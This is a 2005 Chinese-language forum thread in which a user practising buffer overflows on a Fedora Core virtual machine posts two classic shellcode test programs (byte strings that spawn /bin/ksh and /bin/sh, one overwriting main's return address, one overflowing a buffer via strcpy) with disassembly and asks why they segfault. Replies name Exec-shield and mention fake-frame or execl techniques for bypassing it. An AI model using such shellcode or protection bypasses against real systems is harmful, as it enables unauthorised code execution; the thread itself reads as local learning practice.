免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1622 | 回复: 6
打印 上一主题 下一主题

缓冲溢出问题 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-12-30 13:15 |只看该作者 |倒序浏览
我在测试缓冲溢出,本机上安装vmware ,fedro core ,


源程序如下:
  char shellcode[] =

    "\xeb\x18\x5e\x89\x76\x09\x31\xc0\x88\x46\x08\x89\x46\x0d\xb0\x0b\x89\xf3\x8d\x4e\x09"

    "\x8d\x56\x0d\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6b\x73\x68\x00\xc9\xc3";


int main ()

{

    int * ret;  /* 当前esp指向的地址保存ret的值 */


    ret      = ( int * )&ret + 2;  /* 得到 esp + 2 * 4,那是返回地址IP */

    ( *ret ) = ( int )shellcode;  /* 修改了 main() 函数的返回地址,那是很重要的一步 */

}

编译后:
     push %ebp
mov %esp,%ebp
sub $0x8,%esp
and $0xfffffff0,%esp
mov $0x0,%eax
add $0xf,%eax
add $0xf,%eax
shr $0x4,%eax
shl $0x4,%eax
sub %eax,%esp
lea 0xfffffffc(%ebp),%eax
add $0x8,%eax
mov %eax,0xfffffffc(%ebp)
mov 0xfffffffc(%ebp),%eax
movl $0x8049560,(%eax)
leave
ret

  在gdb中,执行到ret前,我察看esp的所指地址中,存放的是shellcode的地址,但是 ret后,报错:
segmentation fault;

我的os是fedora core 2.6.9
且用另一个程序

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
  
char large_string[128];
  
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
  
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
  
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
  
strcpy(buffer,large_string);
}

也报同样的错,我很迷茫阿。高手解决阿

论坛徽章:
0
2 [报告]
发表于 2005-12-30 13:22 |只看该作者
FC有Exec-shield,

那个东西是什么,你可以google一下

论坛徽章:
0
3 [报告]
发表于 2005-12-30 13:58 |只看该作者

回复 2楼 ayazero 的帖子

tks ,我先查一下。我也怀疑内核有某种保护的东西,
再问一句,这可以绕过去吗?

论坛徽章:
0
4 [报告]
发表于 2005-12-30 14:01 |只看该作者
栈溢出有可能,fake frame 或者用execl,在secwiki.com上有

论坛徽章:
0
5 [报告]
发表于 2005-12-30 14:03 |只看该作者

回复 4楼 ayazero 的帖子

ok, 我see see先

论坛徽章:
0
6 [报告]
发表于 2005-12-30 19:29 |只看该作者

回复 2楼 ayazero 的帖子

我查资料了,google上大都是说了个大概。老兄推荐的那个网站,我也逛了。呵呵,没找到有关的资料。
我兄可否有现成的地址可以察看资料阿。

论坛徽章:
0
7 [报告]
发表于 2005-12-31 10:36 |只看该作者
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP